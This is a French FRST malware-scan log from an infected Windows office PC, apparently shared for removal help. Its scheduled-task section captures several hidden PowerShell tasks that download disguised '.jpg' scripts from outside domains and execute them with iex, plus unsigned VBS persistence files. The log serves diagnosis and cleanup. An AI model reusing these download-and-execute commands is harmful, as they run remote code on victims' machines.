Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 04-06-2022 01 Exécuté par BUREAU DU MAS (administrateur) sur DESKTOP-DORMAGC (LENOVO 1577G3G) (05-06-2022 18:05:53) Exécuté depuis C:\Users\BUREAU DU MAS\Desktop Profils chargés: BUREAU DU MAS Plate-forme: Microsoft Windows 10 Professionnel Version 21H1 19043.1706 (X64) Langue: Français (France) Navigateur par défaut: Chrome Mode d'amorçage: Normal ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe <4> (C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\splwow64.exe (C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe (C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe (C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe (C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe (C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe (C:\Program Files\McAfee\WebAdvisor\servicehost.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe (C:\Program Files\NVIDIA Corporation\Display\nvtray.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (cmd.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MSC\MfeBrowserHost.exe <2> (cmd.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\browserhost.exe (explorer.exe ->) (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <37> (explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE (explorer.exe ->) (SEIKO EPSON CORPORATION -> Seiko Epson Corporation) C:\Program Files (x86)\Epson Software\Download Navigator\EPSDNMON.EXE (explorer.exe ->) (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIKEE.EXE <2> (explorer.exe ->) (SonicWall) [Fichier non signé] C:\Program Files (x86)\SonicWall\SSL-VPN\NetExtender\NEGui.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <7> (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <2> (nvvsvc.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe (services.exe ->) (McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe (services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\CSP\5.1.104.0\McCSPServiceHost.exe (services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe <3> (services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe (services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\VSCore_22_2\mcapexe.exe (services.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe (services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe (services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe <2> (services.exe ->) (SEIKO EPSON Corporation -> Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe (services.exe ->) (SonicWall Inc.) [Fichier non signé] C:\Program Files (x86)\SonicWall\SSL-VPN\NetExtender\NEService64.exe (services.exe ->) (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (svchost.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe (svchost.exe ->) (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MQS\QcShm.exe (svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2204.13303.0_x64__8wekyb3d8bbwe\Cortana.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe ==================== Registre (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-11-14] (NVIDIA Corporation -> NVIDIA Corporation) HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1767712 2016-11-14] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé] HKLM\...\Run: [SonicWallNetExtender] => C:\Program Files (x86)\SonicWall\SSL-VPN\NetExtender\NEGui.exe [3563520 2018-01-05] (SonicWall) [Fichier non signé] HKLM-x32\...\Run: [FUFAXRCV] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe [671120 2022-03-03] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) HKLM-x32\...\Run: [FUFAXSTM] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe [896400 2022-03-03] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) HKU\S-1-5-21-3818313502-2494511162-3174529094-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATIKEE.EXE [298560 2013-09-12] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) HKU\S-1-5-21-3818313502-2494511162-3174529094-1001\...\Run: [EPLTarget\P0000000000000001] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATIKEE.EXE [298560 2013-09-12] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION) HKU\S-1-5-21-3818313502-2494511162-3174529094-1001\...\Run: [EPSDNMON] => C:\Program Files (x86)\Epson Software\Download Navigator\EPSDNMON.EXE [346712 2020-07-27] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation) HKU\S-1-5-21-3818313502-2494511162-3174529094-1001\...\Run: [MicrosoftEdgeAutoLaunch_E0C2784C19C686CA4271FE7D86A1002F] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3595192 2022-06-03] (Microsoft Corporation -> Microsoft Corporation) HKLM\...\Windows x64\Print Processors\hpzppw71: C:\Windows\System32\spool\prtprocs\x64\hpzppw71.dll [239704 2017-12-18] (Microsoft Windows Hardware Compatibility Publisher -> Hewlett-Packard Corporation) HKLM\...\Print\Monitors\EPSON WF-3620 Series 64MonitorBE: C:\WINDOWS\system32\E_YLMBKEE.DLL [179712 2013-10-22] (Microsoft Windows Hardware Compatibility Publisher -> SEIKO EPSON CORPORATION) HKLM\...\Print\Monitors\EpsonNet Print Port: C:\WINDOWS\system32\enppmon.dll [558592 2012-11-12] (SEIKO EPSON CORPORATION) [Fichier non signé] HKLM\...\Print\Monitors\PCL hpz3lw71: C:\WINDOWS\system32\hpz3lw71.dll [55392 2017-12-18] (Microsoft Windows Hardware Compatibility Publisher -> Hewlett-Packard Corporation) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\102.0.5005.63\Installer\chrmstp.exe [2022-06-01] (Google LLC -> Google LLC) Startup: C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dmlstl.VBS [2022-05-04] () [Fichier non signé] ==================== Tâches planifiées (Avec liste blanche) ============ (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) Task: {20C9A3CF-955F-4C2E-AD2A-9A1A8FF22F2D} - System32\Tasks\EPSON WF-3620 Series Update {0A8F8332-DD2E-47C1-84EF-9EEF7180195C} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION) Task: {22D33687-DB97-465E-91EE-88E87C4D7315} - System32\Tasks\Unlimited => C:\ProgramData\Unlimited\ISO\Unlimited.vbs [207 2022-05-11] () [Fichier non signé] Task: {251E9B30-9694-4842-B118-7496CDEA2038} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155432 2019-10-11] (Google Inc -> Google LLC) Task: {4196150C-7D1B-4212-B97B-72FCA87CEFA0} - System32\Tasks\Error => C:\ProgramData\Error\ISO\Error.vbs [12395 2022-06-05] () [Fichier non signé] Task: {580E8EF5-B106-4933-A9C4-749F76D801FD} - System32\Tasks\EPSON WF-3620 Series Update {A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION) Task: {5B4F06C3-510E-4F15-BA22-8500CCF7E562} - System32\Tasks\EPSON WF-3620 Series Invitation {A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION) Task: {6D337A76-BA1D-47FC-A9F0-70128E763F11} - System32\Tasks\Turismo => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/tur/turismo.jpg"" -useB|iex; Task: {902C12DD-7B19-4CBB-8F63-A81E977E6DD5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155432 2019-10-11] (Google Inc -> Google LLC) "C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" a été déverrouillé. <==== ATTENTION Task: {A525FC89-4583-474D-9CCF-9F9FEAD43E32} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [926064 2022-02-18] (McAfee, LLC -> McAfee, LLC) Task: {B5F69BC6-8276-4CCF-B563-17357C581AC2} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [926064 2022-02-18] (McAfee, LLC -> McAfee, LLC) Task: {CB425767-D91C-4BD6-BC96-495375A83BD4} - System32\Tasks\HomeOffice => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex; Task: {D200D697-F3D8-480F-A9D6-A8339ED0F302} - System32\Tasks\McAfee\McAfee DAT Built in test => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe [1889696 2021-01-07] (McAfee, Inc. -> McAfee, LLC.) Task: {D29FA4EF-A5D1-4C83-AE84-569FBDE99CDD} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [768288 2022-03-24] (McAfee, LLC -> McAfee, LLC) Task: {E022830E-8C34-429E-96A0-D99407D83010} - System32\Tasks\CCleanData => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://skynetx.com.br/booking.jpg"" -useB|iex; Task: {E75D26A5-D341-4F6E-BA94-6F35AF2247B2} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\DADUpdater.exe [4089168 2022-02-08] (McAfee, LLC -> McAfee, LLC) Task: {F8E3FA99-9FCE-45BC-BACA-0A6CD7143FCE} - System32\Tasks\AudioHD32 => powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""hxxps://unimed-corporated.com/booking.jpg"" -useB|iex; Task: {FFC1FFFE-669D-47B6-BC29-6AF7352B7F17} - System32\Tasks\EPSON WF-3620 Series Invitation {0A8F8332-DD2E-47C1-84EF-9EEF7180195C} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE [679488 2013-02-28] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION) (Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.) Task: C:\WINDOWS\Tasks\EPSON WF-3620 Series Invitation {0A8F8332-DD2E-47C1-84EF-9EEF7180195C}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE Task: C:\WINDOWS\Tasks\EPSON WF-3620 Series Invitation {A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE Task: C:\WINDOWS\Tasks\EPSON WF-3620 Series Update {0A8F8332-DD2E-47C1-84EF-9EEF7180195C}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE:/EXE:{0A8F8332-DD2E-47C1-84EF-9EEF7180195C} /F:UpdateWORKGROUP\DESKTOP-DORMAGC$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi Task: C:\WINDOWS\Tasks\EPSON WF-3620 Series Update {A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSKEE.EXE:/EXE:{A26E3EDB-B1E6-4AD7-AADE-1B9FCCB3AB36} /F:UpdateWORKGROUP\DESKTOP-DORMAGC$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{ab3fd692-225c-47ff-87e0-9c542a404191}: [DhcpNameServer] 192.168.1.1 Edge: ======= Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)] Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)] Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)] Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)] Edge DefaultProfile: Default Edge Profile: C:\Users\BUREAU DU MAS\AppData\Local\Microsoft\Edge\User Data\Default [2022-06-05] Edge Extension: (True Key™ by McAfee) - C:\Users\BUREAU DU MAS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gnnbmcifkkjgjdbkilfglpdpmidkgefn [2022-05-21] Edge Profile: C:\Users\BUREAU DU MAS\AppData\Local\Microsoft\Edge\User Data\Guest Profile [2021-12-04] FireFox: ======== FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi FF Extension: (McAfee® WebAdvisor) - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi [2022-06-03] [UpdateUrl:hxxps://sadownload.mcafee.com/products/SA/Win/xpi/webadvisor/update.json] FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\WebAdvisor\e10ssaffplg.xpi FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2022-03-29] (McAfee, LLC -> ) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2022-03-29] (McAfee, LLC -> ) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-11-14] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé] FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-11-14] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé] Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default [2022-06-05] CHR Notifications: Default -> hxxps://business.facebook.com; hxxps://www.aidetechniqueauto.fr; hxxps://www.epson.co.uk; hxxps://www.epson.fr; hxxps://www.legisocial.fr; hxxps://www.thaiairways.com CHR NewTab: Default -> Not-active:"chrome-extension://kbmkambfpkcpoaalgilkfdgjenkjfhio/ntp1.html" CHR DefaultSearchURL: Default -> hxxps://fr.search.yahoo.com/search?fr=mcafee&type=E211FR885G0&p={searchTerms} CHR DefaultSearchKeyword: Default -> mcafee CHR DefaultSuggestURL: Default -> hxxps://fr.search.yahoo.com/sugg/gossip/gossip-fr-partner?output=fxjson&appid=mca&source=yahoo_mcafee_searchassist&command={searchTerms} CHR Extension: (McAfee® WebAdvisor) - C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2022-05-10] CHR Extension: (QuickTemplateFinder) - C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmkambfpkcpoaalgilkfdgjenkjfhio [2021-04-23] CHR Extension: (McAfee® Web Boost) - C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default\Extensions\klekeajafkkpokaofllcadenjdckhinm [2022-02-25] CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29] CHR Profile: C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\Guest Profile [2019-11-11] CHR Profile: C:\Users\BUREAU DU MAS\AppData\Local\Google\Chrome\User Data\System Profile [2022-03-26] CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] CHR HKLM\...\Chrome\Extension: [klekeajafkkpokaofllcadenjdckhinm] CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] CHR HKLM-x32\...\Chrome\Extension: [klekeajafkkpokaofllcadenjdckhinm] ==================== Services (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (SEIKO EPSON Corporation -> Seiko Epson Corporation) R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [805808 2022-06-03] (McAfee, LLC -> McAfee, LLC) R2 McAPExe; C:\Program Files\Common Files\McAfee\VSCore_22_2\McApExe.exe [816696 2022-03-24] (McAfee, LLC -> McAfee, LLC) R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\5.1.104.0\\McCSPServiceHost.exe [3378048 2022-02-17] (McAfee, LLC -> McAfee, LLC) S3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [1217800 2022-02-04] (McAfee, Inc. -> McAfee, LLC) R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [1217800 2022-02-04] (McAfee, Inc. -> McAfee, LLC) R3 mfevtp; C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe [1217800 2022-02-04] (McAfee, Inc. -> McAfee, LLC) R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1546144 2022-03-04] (McAfee, LLC -> McAfee, LLC) R2 PEFService; C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe [4235968 2022-02-19] (McAfee, LLC -> McAfee, LLC) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6254856 2022-05-13] (Microsoft Windows Publisher -> Microsoft Corporation) R2 SONICWALL_NetExtender; C:\Program Files (x86)\SonicWall\SSL-VPN\NetExtender\NEService64.exe [767488 2018-01-05] (SonicWall Inc.) [Fichier non signé] R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1909.6-0\NisSrv.exe [3004048 2019-10-12] (Microsoft Windows Publisher -> Microsoft Corporation) S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1909.6-0\MsMpEng.exe [103384 2019-10-12] (Microsoft Windows Publisher -> Microsoft Corporation) ===================== Pilotes (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé] R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [72224 2022-02-09] (McAfee, Inc. -> McAfee, LLC) S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus2.sys [160376 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [469528 2022-02-09] (McAfee, Inc. -> McAfee, LLC) R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [344088 2022-02-09] (McAfee, Inc. -> McAfee, LLC) S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [83400 2022-02-09] (Microsoft Windows Early Launch Anti-malware Publisher -> McAfee, LLC) R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [439320 2022-02-09] (McAfee, Inc. -> McAfee, LLC) R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [911904 2022-02-09] (McAfee, Inc. -> McAfee, LLC) R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [645656 2022-02-10] (McAfee, Inc. -> McAfee LLC.) S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [111136 2022-02-10] (McAfee, Inc. -> McAfee LLC.) R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [107040 2022-02-09] (McAfee, Inc. -> McAfee, LLC) R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [228888 2022-02-09] (McAfee, Inc. -> McAfee, LLC) R3 NxDrv; C:\WINDOWS\System32\drivers\NxDrv.sys [34696 2018-01-05] (SonicWall Inc. -> SonicWall Inc.) S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [167544 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [46688 2019-10-12] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [350136 2019-10-12] (Microsoft Windows -> Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [54200 2019-10-12] (Microsoft Windows -> Microsoft Corporation) ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois (créés) (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2022-06-05 18:05 - 2022-06-05 18:07 - 000024421 _____ C:\Users\BUREAU DU MAS\Desktop\FRST.txt 2022-06-05 18:05 - 2022-06-05 18:03 - 002368000 _____ (Farbar) C:\Users\BUREAU DU MAS\Desktop\FRST64.exe 2022-06-05 18:04 - 2022-06-05 18:06 - 000000000 ____D C:\FRST 2022-06-05 18:04 - 2022-06-05 18:04 - 002368000 _____ (Farbar) C:\Users\BUREAU DU MAS\Downloads\FRST64 (1).exe 2022-06-05 18:04 - 2022-06-05 18:04 - 000000000 ___HD C:\$MfeDeepRem 2022-06-05 18:03 - 2022-06-05 18:03 - 002368000 _____ (Farbar) C:\Users\BUREAU DU MAS\Downloads\FRST64.exe 2022-06-05 15:43 - 2022-06-05 15:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee 2022-06-04 15:06 - 2022-06-04 15:06 - 000009160 _____ C:\Users\BUREAU DU MAS\Downloads\dpae (12).pdf 2022-06-04 14:36 - 2022-06-04 14:36 - 000009170 _____ C:\Users\BUREAU DU MAS\Downloads\dpae (11).pdf 2022-06-02 10:44 - 2022-06-02 10:45 - 000344789 _____ C:\Users\BUREAU DU MAS\Downloads\ae-1713310169.pdf 2022-06-02 10:40 - 2022-06-02 10:40 - 000345413 _____ C:\Users\BUREAU DU MAS\Downloads\ae-1713309181.pdf 2022-05-27 16:25 - 2022-05-27 16:25 - 000069931 _____ C:\Users\BUREAU DU MAS\Downloads\Fiche-de-paie-type-1.xlsx 2022-05-25 16:55 - 2022-05-25 16:55 - 000064320 _____ C:\Users\BUREAU DU MAS\Downloads\doc21.pdf 2022-05-25 16:54 - 2022-05-25 16:54 - 000063961 _____ C:\Users\BUREAU DU MAS\Downloads\doc62.pdf 2022-05-19 22:03 - 2022-05-20 15:57 - 000003854 _____ C:\WINDOWS\system32\Tasks\AudioHD32 2022-05-18 16:37 - 2022-05-18 16:37 - 000009170 _____ C:\Users\BUREAU DU MAS\Downloads\dpae (10).pdf 2022-05-17 07:51 - 2022-05-17 07:51 - 000050424 _____ C:\Users\BUREAU DU MAS\Downloads\document.pdf 2022-05-17 07:51 - 2022-05-17 07:51 - 000017766 _____ C:\Users\BUREAU DU MAS\Downloads\document (1).pdf 